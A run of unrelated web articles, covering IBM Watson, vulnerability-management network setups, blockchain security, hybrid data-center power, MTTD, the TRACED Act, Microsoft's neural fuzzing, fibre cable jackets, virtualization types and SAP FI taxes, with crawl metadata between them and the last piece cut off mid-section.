The very clever choice made for Watson was to copy the competition aspect of Deep Blue: have Watson compete with humans. The American quiz Jeopardy! was an ideal battlefield: participants answer cryptic questions that cover many knowledge fields such as sport, geography, history, arts, etc. So, just as in chess, skills needed to be built up and mastered in numerous areas but in the end there is only a 1 dimensional measurement required for evaluation of all skills together. Both in chess and Jeopardy! you win by scoring more points than your opponents.
So, what needed to be done for Watson to win Jeopardy? Of course, a huge pile of information, the equivalent of 1 million books, needed to be stored and made accessible. Access to internet was forbidden, just as it was for humans. After the question, Watson searched this pile to find pieces of information that could be (parts of) answers. But, most importantly, only 1 answer could be given and, because wrong answers would result in point subtraction, Watson needed to be “sufficiently confident” about an answer before giving it. Watson needed to rank the candidate answers by confidence level, somehow. Just counting hits was not sufficient. To build up the confidence, Watson used its Natural Language Processing skills to find evidence for the candidate answers. In essence, this led to a basic level of understanding language, clearly very useful if you want to answer a question successfully. Lastly, to make a chance to beat the human champion, this whole process, starting with the search through a million books, would need to be finished within a few seconds.
In 2011 Watson has beaten the human champions.
After winning Jeopardy! sceptic people asked: “OK, so IBM has this game winning computer, so what?”. But it has turned out that Cognitive Computers have great potential in many fields. They need to have access to all relevant sources and be “trained” before they can be used. During this training, humans tell the computer which answers are correct and which are wrong while the computer makes adaptations in its software accordingly. Even during normal usage, the training continues when users give feedback on the quality of the answers. So Cognitive Computers continue learning and become better and better.
In 2014 Watson has grown to a whole family of commercial applications:
- in Healthcare to help doctors identify treatment options
- in Finance to help planners recommend better investments
- in Retail to help retailers transform customer relationships
- in Public Sector to help government help its citizens
- Watson Engagement Advisor to handle customer interactions with natural language skills
- Watson Discovery Advisor to assist Research by discovering patterns in all kinds of data
- Watson Ecosystem as a cloud based environment offering Watson capabilities to developers to create “cognitive apps”
- Watson Foundations as a Big Data and Analytics Platform.
What will be the future of Watson?
Any area where decisions need to be made and where decision quality improves with using relevant knowledge, where important questions have multiple correct answers but only one best answer, any of these areas is a candidate where Watson can have breakthrough impact. The data that is underlying this knowledge can be characterised in Big Data terms of Volume (how many Terabytes or even Petabytes large is the area), Velocity (how quickly does it grow in terms of Gigabytes per second), Variety (is the data structured or unstructured, does it consist of text, pictures, movies, sound, etc) and Veracity (to what extent can data be trusted). Any of these 4 dimensions can grow beyond what can be grasped by a mere human individual and puts Watson in a position to become of value.
A great example is Watson’s impact in medical oncology. Medical information doubles in volume every five years, and physicians practicing in the rapidly changing field of oncology are challenged to remain current with medical literature, research, guidelines and best practices. Keeping up with the medical literature can take an individual physician as many as 160 hours a week. But Watson can do this and ensure that decision making of physicians remains based on up to date information.
IBM’S WATSON helping to fight against leukemia at MD Anderson
But imagine how much its value would grow if the data sources would expand: include besides oncology also other related medical fields, include next to English also other languages and also include other media such as X-ray and MRI pictures. Perhaps all of this, and more, can be accomplished with a Mega Watson: Watson scaled up a million times.
Perhaps not. Watson has already benefitted from hardware evolution since 2011. Its original size of 10 racks POWER 750 servers with 2880 cores has shrunk to only 3 “pizza boxes”. But a recent hardware revolution has the potential to dramatically improve Watson. TrueNorth is a neuro-synaptic computer chip by functioning like the human brain with the equivalent of 1 million neurons interconnected via 256 million synapses. With its 5.4 billion transistors it is one of the largest chips ever but still consumes less than 0.1 Watt. Running Watson cognitive software on cognitive TrueNorth hardware could result in Mega Watson in the coming years.
And have a look at the progress of the previous Grand Challenge. Today, computers “play” chess on astronomical levels that leave world champions completely without any hope to win. And you don’t need the proverbial mainframe for that. You can buy a strong chess program for a few 100 euro’s and run it on your laptop or smart phone. Of course, it is strictly forbidden to use them during chess tournaments but they are used during game preparation and to get a definitive judgement about game positions. If it indicates that White can get “decisive advantage” by playing the advised move then that will serve as ground truth. And if someone disagrees, it will be based on another, perhaps stronger, chess program. In their preparation, chess players, depend on their computer. All in all, todays chess players play stronger than decades ago, as indicated by the official ELO chess strength ratings.
The same will happen with Watson. Its advice better be followed because it is the best answer based on all available information. In just a few years, it will simply be a bad idea to make important decisions without support from cognitive systems. A decision maker will be held responsible and may be liable to prosecution after deviating unsuccessfully from the cognitive system recommended option. It will be forbidden not using them.
And after that? Imagine having the equivalent of a million TrueNorth chips containing sufficient neurons to compare with the human brain or a billion which exceeds the human brain. Via its connections with the Internet of Things, it will have access to billions of external signals and it will sense what is happening in the world. Might self-consciousness emerge? I posit this as a future Grand Challenge to “build a Sentient Computer that is self-conscious, senses the world and outwits the smartest humans”. But you won’t find this in Watson’s roadmap documentation 😉
First thing to solve is to have a one dimensional metric. Only then we can answer “Where are we now?”, how much progress is needed and when it might be achieved. David Bowie would say “the moment it knows it knows we know”.
This post was written by:
dr. Maris van Sprang, Ph.D.
Senior IT Architect &
Benelux TEC Council Member
TOGAF 9 Certified
Maris can be reached at: firstname.lastname@example.org | <urn:uuid:0df97387-73f5-4fc2-8e19-73ce9a3253e9> | CC-MAIN-2024-38 | https://www.ibm.com/blogs/think/nl-en/2014/10/20/watson-and-other-impossible-grand-challenges/ | 2024-09-08T11:11:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650976.41/warc/CC-MAIN-20240908083737-20240908113737-00856.warc.gz | en | 0.953068 | 2,105 | 2.90625 | 3 |
The architecture of the product is network-neutral and therefore helps administrators manage vulnerabilities in computers that have Microsoft Windows installed in them, irrespective of their network setup. Your network setups can include the following:
If you have a Windows Active Directory-based network, you can install the Central Server in a single location for centralized management all the computers within the Active Directory. For more information, see Architecture for LAN.
If you have a workgroup-based network, you can manage the computers in the workgroup from a central location. You should ensure that all the computers have a common set of credentials. For more information, see Architecture for LAN.
The WAN architecture helps you to manage Windows computers that span across multiple locations. These computers can be connected using a Virtual Private Network (VPN) or through the Internet. When computers in different locations are connected using the Internet, the Central server should be installed and configured as an edge device. This means that the designated port should be accessible through the Internet. You need to adopt necessary security standards to harden the operating system where the Central server is installed.
You must open the following Web ports in the server:
For more information, see Architecture for WAN.
You can manage computers of mobile or roaming users who connect to your network using a VPN connection or through the Internet. The agent installed in their computers contacts the Central server installed in your network periodically. It gathers information about the necessary instructions and executes the same. It also updates the data and status information in the Central server. For more information, see Architecture for WAN.
Computers across multiple domains can be managed if the multiple domains are set up in the following ways:
The computers within the same domain or workgroup should have a common set of credentials irrespective of the domains they are combined with. For more information, see Architecture for WAN and Architecture for LAN.
*Refers to Active Directory, workgroups or other directory-based networks | <urn:uuid:829a4c18-db47-4f40-b8ef-cfd206f70f9d> | CC-MAIN-2024-38 | https://www.manageengine.com/vulnerability-management/help/supported-networks.html | 2024-09-08T09:26:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650976.41/warc/CC-MAIN-20240908083737-20240908113737-00856.warc.gz | en | 0.897417 | 396 | 2.578125 | 3 |
In an era where cyberattacks can paralyze entire networks, the need for effective, reliable IT security has become paramount.
Some think they have found the silver bullet in the war against hackers.
The Blockchain Revolution
When Bitcoin creator Satoshi Nakamoto, whose true identity is still unknown, revealed his revolutionary currency idea in a 2008 white paper, he also introduced the beginnings of a unique peer-to-peer authentication system that today we call Blockchain.
The brilliantly innovative blockchain system at its core was an open ledger that records transactions between two parties in a permanent way without needing third-party authentication.
Based on decentralization, blockchain data (block) can’t be changed without changing the other associated, yet distributed blocks.
For years, blockchain and Bitcoin remained one and the same. About five years ago, innovators in the industry began to realize that blockchain could be used for more than just securing cryptocurrency by just altering the system.
Indeed blockchain has proved extremely durable, standing up to some of the fiercest cyberattacks for almost a decade.
While the advantages of blockchain are clear, the system still has its drawbacks.
One risk of working on a blockchain based system is the danger of irreversibility. Because the protocols are so resistant to change, users could become permanently locked out in the event that private keys are forgotten or otherwise lost.
The system also has issues with storage. Each block can contain no more than 1 Mb of data. The system in its current form isn’t particularly fast, with the capacity to handle only seven transactions per second. This will may make the system incompatible for enterprises that need to sort through large quantities of data with speed.
Initial costs to integrate Blockchain into an existing business, especially ones that include supply chain systems, may be preventatively too high for many companies.
It’s important to realize that blockchain is not impervious to attack. To date, there have been several instances of specialized attacks that have succeeded in overcoming Blockchain.
And having your Blockchain hacked comes with an additional risk. Because such as system makes all pieces of data fundamentally integrated, if attackers manage to pull off a hack, it could spell the loss of a company’s entire database.
In conclusion, companies need to assess the risks and benefits of going blockchain, and determine if the system is best for their business model. Adaptability, cost, and overall increases in security will be important factors in determining if Blockchain is a proper fit for your enterprise. | <urn:uuid:da10ac53-140c-4744-b86b-aa64c530858b> | CC-MAIN-2024-38 | https://gttb.com/2018/07/30/blockchain/ | 2024-09-09T16:05:10Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00756.warc.gz | en | 0.949682 | 506 | 2.84375 | 3 |
The global fight to minimise climate change is gaining momentum as more and more industries come aboard. With its commitment to achieve carbon neutrality by 2030 and reaching 75 percent of this goal already in 2025, the data center industry is at the forefront. With the first milestone barely four years away, the clock is ticking, and data center operators need to find ways to achieve carbon neutrality.
Bridging the gap between reliability and sustainability
Increasing the use of renewables in power systems is an obvious way of reducing data center climate impact.
Renewables have come a long way in recent years and are now mature, efficient, and competitive. However, their inherently unstable nature runs counter to the need for uninterrupted power in a data center. To put it very simply, you can’t power a server rack from a PV panel on overcast days.
Fortunately, you do not have to choose between sustainability and reliability. With hybrid eco-systems, you can reduce climate impact while ensuring constant power. This is achieved by adding and prioritising renewables but backing them up with other power sources, and by running those (typically fossil-fuelled) power sources more efficiently, thereby lowering fuel consumption and reducing climate impact.
What is a hybrid eco-system?
Hybrid power is a solution covering a given load demand using a combination of two or more different power sources.
The operator can combine the connected sources as needed to exploit their benefits and reach different operational targets. When renewables are included in a hybrid solution, it is often called an eco-system.
Examples of hybrid eco-systems include a wind or PV plant with a battery energy storage system (BESS), or a setup that combines many power sources: mains power, gensets, several renewables, and BESS.
Flexible by nature, hybrid eco-systems are ideally suited for reducing climate impact because you can configure them to run in a climate-friendly way. For example, they can be set up to use renewable power sources whenever possible, relying on mains or diesel gensets only for backup.
How do you set up and control a hybrid eco-system?
With several different power sources and many possible operating scenarios, the control solution for a hybrid eco-system needs to be intelligent, quick-reacting, and flexible. In order to guarantee uninterrupted uptime, it must also be designed for resilience with full redundancy.
At DEIF, we recommend controlling hybrid eco-systems using an intelligent power management system (PMS) with interconnected controllers capable of handling all the different power sources, and of retaining system control even if a controller fails.
We offer a complete range of compatible controllers that can be combined and connected as desired: AGC-4 Mk II genset and mains controllers and ASC-4 sustainable controllers, capable of handling renewables such as PV panels and turbines plus BESSes.
When combined in an intelligent PMS, the controllers exchange information about the current load demand and the available power from the various sources.
They ensure that the load demand is met according to your requirements, for example by prioritising renewable. They also allow you to carry out other tasks such as storing low-tariff mains power in a BESS for later use or running gensets at their optimal duty point.
Advanced DEIF controllers require no programming. They come with factory logic that has been proven in many different critical power applications, and they only need to be configured for the specific application.
Designed for compatibility, they can quickly be reconfigured on the fly without any downtime, and the system can easily be expanded if more power sources are added to your hybrid eco-system as your requirements change.
Not all or nothing
This controller flexibility is great news if you were wondering if going hybrid is all or nothing at all. With a DEIF PMS, you can make the transition at your own pace, expanding or reconfiguring your hybrid eco-systems as needed.
This means that getting started on the road to carbon neutrality is relatively easy. If you already have a reliable genset or mains-based power setup, for example, you can expand it with one or more renewables and DEIF controllers.
The transition to carbon-neutral data center power needs to happen, but it does not need to happen all at once.
With a reconfigurable, flexible, and intelligent DEIF PMS controlling your hybrid eco-system, you are free to chart your own course towards green data center operations.
For more details, download DEIF’s free whitepaper, ‘Achieving carbon neutrality with hybrid eco-systems’ at deif.com. | <urn:uuid:c32266c0-71d6-4096-a518-f80dff70bb32> | CC-MAIN-2024-38 | https://www.datacenterdynamics.com/en/opinions/achieve-sustainable-uptime-with-hybrid-eco-systems/ | 2024-09-09T14:36:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00756.warc.gz | en | 0.940705 | 962 | 2.953125 | 3 |
Mean Time To Detect (MTTD), also known as Mean Time To Identify (MTTI), is one of the main key performance indicators in Incident Management. MTTD refers to the mean (average) amount of time it takes for the organization to discover or detect an incident. The MTTD formula is shown below:
A shorter MTTD means that users suffer from IT disruptions for less time than with a longer MTTD. Incident detection can come from people, such as end-users reporting a software outage, or from systems monitoring and management tools. Generally, IT organizations strive to detect an issue before an end-user does, to minimize the disruption it causes, but this is not always possible. The beginning of an issue should be recorded by affected IT equipment and the software programs that run on it. For example, a security intrusion could be tracked to a password entered on the breached system at a specific time. The MTTD KPI can help show if IT monitoring technologies collect sufficient data and cover the probable sources of incidents.
What does this mean for an SMB?
SMBs should strive to have the lowest possible MTTD, the best way to do this is to have strong cybersecurity measures in place. In order to stay secure, your company needs to take proactive measures to reduce its chances of being compromised by cyberattacks. CyberHoot recommends the following best practices to avoid, prepare for, and prevent damage from these attacks:
- Adopt two-factor authentication on all critical Internet-accessible services
- Adopt a password manager for better personal/work password hygiene, to house unique 14+ character passwords for every account
- Require Governance Policies (WISP, Password, Acceptable Use, Information Handling, Incident Response, and VAMP)
- Follow a 3-2-1 backup method for all critical and sensitive data
- Train employees on cybersecurity skills they need such as strong password hygiene and how to spot and avoid phishing attacks
- Test that employees can spot and avoid phishing emails by testing them
- Document and test Business Continuity Disaster Recovery (BCDR) plans
- Perform a risk assessment every two to three years
Start building your robust, defense-in-depth cybersecurity plan at CyberHoot.
To learn more about the Incident Response Process and Policy, watch this short video:
CyberHoot does have some other resources available for your use. Below are links to all of our resources, feel free to check them out whenever you like:
- Cybrary (Cyber Library)
- Press Releases
- Instructional Videos (HowTo) – very helpful for our SuperUsers!
Note: If you’d like to subscribe to our newsletter, visit any link above (besides infographics) and enter your email address on the right-hand side of the page, and click ‘Send Me Newsletters’. | <urn:uuid:e3dea5e8-bda7-4686-994b-60ba2df1a92b> | CC-MAIN-2024-38 | https://cyberhoot.com/cybrary/mean-time-to-detect-mttd/ | 2024-09-10T20:02:54Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651318.34/warc/CC-MAIN-20240910192923-20240910222923-00656.warc.gz | en | 0.920583 | 598 | 2.671875 | 3 |
What’s the Buzz About?
Have you ever wondered how much the government knows about the artificial intelligence models you interact with daily? According to The Financial Times1, the British government is keen to understand the inner workings of large language models like OpenAI’s ChatGPT and Google’s LaMda. However, tech companies are wary of sharing sensitive business information due to potential risks.
The UK government’s interest in these AI models comes as part of an initiative to better anticipate the risks tied to such technology. They are particularly keen on understanding the “model weights” used by these companies. Model weights are critical factors in language models that influence the outcome of AI computations.
OpenAI and other companies have so far not been required to disclose how their language models function. While the companies aren’t resisting this transparency, they caution that it’s a sensitive exercise fraught with security risks.
Why Bletchley Park?
In November, an AI summit will take place at Bletchley Park in the UK2, a significant location known for its role in decoding messages during World War II. The summit will serve as a platform for politicians, academics, and AI company executives to discuss the use and potential regulation of artificial intelligence.
The Delicate Balance
So, what’s holding these companies back? According to a representative from the UK government, it’s not a matter of reluctance. Instead, the issue lies in the delicate nature of the technology and the numerous security risks that need to be considered. Earlier this year in June, companies like DeepMind, OpenAI, and Anthropic indicated a willingness to share more details with the UK government, but the extent of information to be disclosed remains unclear.
Questions Looming Ahead
You might ask, “What are the implications for the general public?” or “How will this affect the future of AI?” While the exact outcomes are uncertain, the UK government’s move could set a precedent for greater scrutiny and regulation of AI technology, which may have both positive and negative impacts.
The UK government is eager to delve into the mechanics of large language models like ChatGPT and LaMda. Although tech companies are open to sharing, they are careful due to the inherent risks involved. The upcoming AI summit at Bletchley Park could be a pivotal moment for the future of AI regulation. | <urn:uuid:7d5ae5b4-b49a-4899-88d5-8a5138fdea09> | CC-MAIN-2024-38 | https://cyberwarzone.com/uk-government-seeks-insight-into-large-language-models-like-chatgpt-and-lamda/ | 2024-09-10T21:36:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651318.34/warc/CC-MAIN-20240910192923-20240910222923-00656.warc.gz | en | 0.944991 | 499 | 2.640625 | 3 |
What is the TRACED Act?
The TRACED (Telephone Robocall Abuse Criminal Enforcement and Deterrence) Act is a piece of bipartisan legislation that was signed into law on December 31, 2019. The Act seeks to increase enforcement against telemarketers and scammers making illegal robocalls, and among other things, requires the FCC to establish a call authentication framework and mitigation criteria aimed at preventing the ultimate delivery of fraudulent calls to end-users.
History of the TRACED Act
Legislation intended to protect consumers from annoying and potentially predatory marketing began in 2003 with the FTC’s Do Not Call List, but enforcement proved challenging. The abuse of technology that enables computerized autodialing, has allowed nefarious robocallers to reach thousands of numbers with abusive and illegal pre-recorded messages necessitated the need for more robust federal legislation. As a result, The Pallone-Thune TRACED Act was passed by Congress in December, 2019..
In a bipartisan effort to combat illegal robocalling, the TRACED Act passed the House of Representatives on December 4, 2019, the Senate on December 19, 2019, and was signed into law on December 31, 2019. Pursuant to this legislation, the FCC was required to develop and adopt rules requiring telecommunications providers to instate authentication protocols over the following 18 months. Additionally, the TRACED Act requires the FCC to conduct an internal review of the effectiveness of the call authenticated technologies required of providers every three years.
How does it work?
Pursuant to the TRACED Act, the FCC will require telecom providers to adopt a call authentication framework, or show reasonable progress towards adopting one, within the 18 months following passage. The call authentication framework that has been established is commonly referred to as STIR/SHAKEN, an acronym meaning Secure Telephone Identity Revisited and Signature-based Handling of Asserted Information Using toKENS. STIR/SHAKEN allows calls to be authenticated by a digital “signature” of the originating service provider and then passed unchanged through the telecom network to the terminating provider of the intended recipient.
The implementation of STIR/SHAKEN not only helps to prevent scammers from illegally spoofing a number (misidentifying themselves on caller ID), but it will also allow the FCC and other enforcement agencies to more readily identify the originating source of illegal robocalls. Tracing illegal calls back to their source is critical for the enforcement of the TRACED Act, and could serve as a powerful deterrent for would-be scammers and harassers. Additionally, call authentication is designed to help differentiate between illegal robocalls and legitimate automated calls such as school notifications by giving callers making legal use of autodialing technology an opportunity to clearly identify themselves and their traffic.
The goal of the TRACED Act is to facilitate more effective enforcement against illegal robocalling. A key tool in this multifaceted effort is to more readily distinguish legitimate calls from illegal calls by implementing an authentication framework. By cracking down on illegal robocalling, this legislation aims to reduce a tremendous nuisance, but more importantly, protect vulnerable populations from fraudulent telephone scams. | <urn:uuid:8d24cb9c-9571-48b0-aa75-f35a5a0b6c3e> | CC-MAIN-2024-38 | https://www.bandwidth.com/glossary/traced-act/ | 2024-09-10T21:35:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651318.34/warc/CC-MAIN-20240910192923-20240910222923-00656.warc.gz | en | 0.937227 | 650 | 3.375 | 3 |
Microsoft Uses Neural Networks to Make Fuzz Tests Smarter
Neural fuzzing can help uncover bugs in software better than traditional tools, company says.
November 15, 2017
Microsoft has developed a new technique to test software for security flaws that uses deep neural networks and machine learning techniques to improve upon current testing approaches.
Early experiments with the new "neural fuzzing" method show that it can help organizations uncover bugs in software better than traditional fuzzing tests, according to Microsoft.
Fuzzing is an approach where security testers try to uncover commonly exploitable flaws in applications by targeting the software with deliberately malformed data—or inputs—to see if it will crash so they can investigate and fix the cause.
The effectiveness of these tests depends to a large extent on how well the malicious inputs are crafted. Generally, the more input you find to trigger a crash, the more application vulnerabilities you are likely going to be able to identify and close.
Security testers can use a few different methods to generate the malicious or malformed input.
Microsoft's approach improves on one method that uses data from previous fuzz tests as feedback for creating new mutations or tests. The approach involves a "learning technique that uses neural networks to learn patterns in the input files from past fuzzing explorations to guide future fuzzing explorations," according to Microsoft.
"The neural models learn a function to predict good (and bad) locations in input files to perform fuzzing mutations based on the past mutations and corresponding code coverage information," the company said.
Neural networks are computing systems loosely modeled on the human brain that can autonomously learn from observed data. Many modern applications such as face and voice recognition and weather prediction use such networks.
Microsoft has implemented the new technique in American Fuzzy Lop (AFL), an open-source fuzzer that uses observed behavior from previous fuzzing executions to guide future tests. Researchers from the company tested the method on four target programs using parsers for the ELF, XML, PNG and PDF file formats.
The results were "very encouraging," Microsoft Development Lead William Blum said in a blog Monday. "We saw significant improvements over traditional AFL in terms of code coverage, unique code paths and crashes for the four input formats, " he said.
For instance, for the ELF parser, the neural AFL reported more than 20 crashes compared to zero with the traditional AFL fuzzer. Similarly, the neural AFL found 38% more crashes than traditional AFL for text-based file formats such as XML.
"This is astonishing given that neural AFL was trained on AFL itself," Blum said. The only area where the neural AFL did not perform as well was with PDF format, likely because of the large size of the files.
"AFL is essentially a mutational fuzzer that uses feedback from the target software to determine how the test cases are mutated," says Jonathan Knudsen, Security Strategist at Synopsys. "Microsoft has modified the feedback mechanism with a neural network."
The challenge with any fuzzing lies in finding the finite set of malformed inputs that are most likely to trigger bugs, Knudsen says. "Microsoft has modified how AFL chooses its inputs in a way that gave them better code coverage and more bugs for a couple of applications."
Moreno Carullo, co-founder and chief technical officer of Nozomi Networks says Microsoft has broken new ground with this technique. "It is absolutely a new [and] innovative approach," Carullo says.
"Neural fuzzing increases the speed of fuzzing as a test method and also finds more issues that cause a crash," he notes. The automation behind the approach can drastically reduce the time organizations require to test their software for security vulnerabilities. "Without this, it would take a team of heuristics experts a lot more time to discover the issues."
According to Blum, the capability that Microsoft has demonstrated only scratches the surface of what can be achieved using neural networks in fuzzing. "Right now, our model only learns fuzzing locations, but we could also use it to learn other fuzzing parameters such as the type of mutation or strategy to apply," he said.
Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.
About the Author
You May Also Like
State of AI in Cybersecurity: Beyond the Hype
October 30, 2024[Virtual Event] The Essential Guide to Cloud Management
October 17, 2024Black Hat Europe - December 9-12 - Learn More
December 10, 2024SecTor - Canada's IT Security Conference Oct 22-24 - Learn More
October 22, 2024 | <urn:uuid:46f318ab-80ce-4ea7-b79d-68043e64aeb2> | CC-MAIN-2024-38 | https://www.darkreading.com/application-security/microsoft-uses-neural-networks-to-make-fuzz-tests-smarter | 2024-09-12T03:23:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00556.warc.gz | en | 0.945798 | 971 | 2.640625 | 3 |
Fibre optic cable is applied as the most advanced communication medium by more and more users. Compared with copper cable, it can support more and better optical signal transmission of voice, data, video, etc. and offer many other advantages. When purchasing fibre optic cables, you must see the cable jacket at first. So what information does the outside jacket tell? What type of cable jacket should you select? Come with me to find the secrets of fibre cable jacket.
Fibre optic cable is constructed very complicated from the inside core, cladding, coating, strengthen fibres to the outside cable jacket. The core made of plastic or glass is the physical medium for optical signal transmission. As bare fibre can be easily broken, cable outer jacket is needed for fibre protection. The cable jacket is the first line of moisture, mechanical, flame and chemical defense for a cable. Without the jacket, fibre optic cables are very likely to be damaged during and after installation.
In most situations, robust cable jacket is better because the environment above or underground may be harsh. For better applications, you’d better take cable jacket seriously. Cable jacket is not as easy as you think. There are many characteristics you need to consider. Except the flexibility, it should withstand very low and high temperature. Whether the cable jacket has the good features of chemical and flame resistance. All these characteristics depend on cable jacket materials.
Cable jacket is made of various types of materials. As mentioned above, the cable jacket should stand the test of different environmental conditions, including the harsh temperature, the sun & the rain, chemicals, abrasion, and so on. The following shows several common cable jacket materials for your reference.
PE (Polyethylene)—PE is the standard jacket material for outdoor fibre optic cables. It has excellent properties of moisture and weather resistance. It also has the good electrical properties over a wide temperature range. Besides, it’s abrasion resistant.
PVC (Polyvinyl Chloride )—PVC is flexible and fire-retardant. It can be used as the jacket materials for both indoor and outdoor cables. PVC is more expensive than PE.
LSZH (Low Smoke Zero Halogen)—LSZH jacket is free of halogenated materials which can be transformed into toxic and corrosive matte during combustion. LSZH materials are used to make a special cable called LSZH cable. LSZH cables produce little smoke and no toxic halogen compounds when these cables catch fire. Based on the benefits, LSZH cable is a good choice for inner installations.
Fibre cable jacket colour depends on the fibre cable type. Fibre cable includes single-mode and multimode types. For single-mode fibre cable (Blog about single-mode fibre cable please read my blog What Are OM1, OM2, OM3 and OM4?), the jacket colour is typically yellow. While for multimode cable ( more details on multimode fibre cable ), the jacket colour can be orange (OM1&OM2 cable), aqua (OM3 cable) and purple (OM4 cable). For outside plant cables, the jacket colour is black.
To choose a fibre optic cable depends on your own applications. I’ll talk about this from two sides of jacket colour and jacket material. The cable jacket colour is not just for good looking. Different colour means different fibre mode. Which one suits you the most, the yellow or orange fibre cable? You should know well about the colour codes before buying your fibre cables. What’s more, you should also consider the installation requirements and environmental or long-term requirements. Where will be your fibre cables installed, inside or outside the building? Will your cables be exposed to hash environment very long? This can help you decide which jacket material is the best.
As a popular data transmission medium, fibre cable plays an important role in communication field. To some degree, the success of fibre connectivity lies in a right fibre cable. How to buy suitable fibre optic cables? This article describes the method from cable jacket. When selecting fibre cable, many other factors still need to be considered. Hope you can get your own fibre cable. | <urn:uuid:97f0c421-f657-42f0-8c7d-f030c4bcdc46> | CC-MAIN-2024-38 | https://www.fiber-optic-equipment.com/can-get-fiber-cable-jacket.html | 2024-09-12T03:02:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00556.warc.gz | en | 0.91404 | 855 | 2.71875 | 3 |
The tech turnover and work shortage may be affecting your IT department.
The 6 Types of Virtualization—Which Is Right for Your Organization?
Virtualization is a computing technology that transforms the functionality of physical hardware into virtual resources such as servers, applications, networks, and storage.
Nowadays, organizations of all sizes embrace virtualization to increase operational efficiency, minimize IT-related costs, and enhance security.
While this is a game-changer, some organizations are unaware of the various types of virtualization—and how they can benefit from them. To help you stay ahead, we've compiled everything you need to know in this article.
The 6 Types of Virtualization: How They Help Your Organization
Here are the six most common types of virtualization and how they can benefit your organization:
1. Application Virtualization
This virtualization technology lets users access a remote version of an app, even if it isn't installed on their device. Instead, the deployed application is installed locally on a server and made available to end users when they ask for it.
Virtualization makes it easier for organizations to maintain and update their applications. It enhances security and privacy, as only administrators can modify and control app permissions. With application virtualization, companies can make it easier for employees to work remotely by giving them access to critical applications.
2. Data Virtualization
Data virtualization is a modern approach to data integration that allows an organization’s users to view enterprise data from numerous systems in a single dashboard. This type of virtualization does not copy data, but rather makes it available to end users from a unified perspective.
With real-time access to enterprise information, organizations can track their performance quickly and make management decisions that are based on solid, comprehensive information.
3. Desktop Virtualization
This technology allows end users to simulate their desktop workstations from any computing device, regardless of location. This works similarly to application virtualization, but houses whole desktop environments instead of just applications.
Desktop virtualization is a key component of a digital workspace. It makes it easier for IT teams to manage company devices and reduces security risks associated with lost devices or compromised data.
4. Network Virtualization
Network virtualization synthesizes a network's physical and software components into one single software-based resource. It also entails dividing the network bandwidth into independent channels.
Because administrators can modify and control every network element without touching the underlying physical components, this technology creates an environment that is much easier to monitor and administrate.
5. Server Virtualization
Virtualizing a server entails partitioning one physical server into multiple virtual servers. These servers can run as separate machines, allowing organizations to run multiple operating systems using a single host. By doing so, they can reduce operational costs and enjoy faster deployment times.
Server virtualization also increases security by concealing the location of host servers.
6. Storage Virtualization
Organizations that create and store large amounts of data can benefit from storage virtualization. Instead of utilizing a hard drive, this solution enables organizations to store their data in the cloud or on a virtual server.
This technology makes it easier to organize, duplicate, and transfer enterprise data. Incorporating cloud virtualization in the IT environment can help organizations reduce costs associated with physical data storage—and improve their disaster recovery strategies.
Leverage the Power of Virtualization by Partnering with Data Networks
The combination of cloud computing and virtualization has created revolutionary solutions for organizations, enabling them to improve efficiency and create scalable systems. However, learning the types of virtualization technologies available is just the beginning—knowing which type you need and how to incorporate them into your organization is the real challenge. Let Data Networks assist you with this.
At Data Networks, we provide organizations of all sizes with tailored IT solutions to boost their systems' productivity, efficiency, and security.
Reach out today to learn how we can make a difference for your organization. | <urn:uuid:b6274026-7d99-44e1-ab8c-c6aeb140902c> | CC-MAIN-2024-38 | https://blog.datanetworks.com/home/the-6-types-of-virtualization-data-networks | 2024-09-13T09:35:16Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00456.warc.gz | en | 0.9207 | 803 | 2.65625 | 3 |
Welcome to the tutorial about SAP FI Tax functionality. This is an introductory tutorial about taxes in SAP FI included in our free SAP FI course. Learn about the high-level flow of processing of taxes in FI module of SAP ERP.
SAP Financial Accounting can be used to manage all types of taxes according to region or country requirements. In sub-modules of financial accounting, various tax functions can be utilized which include tax calculation, tax posting, tax adjustments and tax reporting. This tutorial will help the reader to have a helicopter view of SAP FI tax functionality and have a clear understanding of how tax components are linked. Below is a flowchart showing all components involved when a tax line item is being posted in financial accounting.
Different countries use tax laws and calculation methods. In other countries, different regions can use different calculation rules and procedures, as a result, taxes are dealt with in SAP at country level. When you are making settings for taxes in SAP FI you set those per country. After the calculation procedure is defined, it is assigned to country.
A calculation procedure contains the specifications that are necessary for the calculation and posting of tax on sales or purchase. The calculation procedure is assigned to a country. These calculation procedures contain tax types which are better known as condition types. Examples of condition types are input tax and output tax. The tax type defines the base amount on which the tax will be calculated and the account key to be used for posting the tax. Calculation procedure also contain the calculation rule, for example, whether percentage is included (A) or percentage not included (I). It is again in the calculation procedure where its specified as to which side of the account the tax amount is posted. The calculation procedure also specifies whether the user will be allowed to change the proposed tax amounts manually or not. It’s possible to lock percentages such that the user cannot change percentages.
SAP FI Tax Codes
The tax codes are defined by entering a two-digit code. This code can be alphanumeric and is used to represent a tax percentage rate. Tax codes are used to check if the manually entered tax amount is correct or to calculate the amount of tax on sales or purchases automatically. The tax code checks if the account can be posted to with the specified tax code and also determines the tax account. It is in the tax code where its specified weather it’s a tax code for input tax or output tax. A tax code can only be either in the category of input tax or output tax, it can’t be in both. The tax code can be set to output either an error or a warning if the manually entered tax amount is different from the one automatically calculated.
SAP FI Tax Account Determination
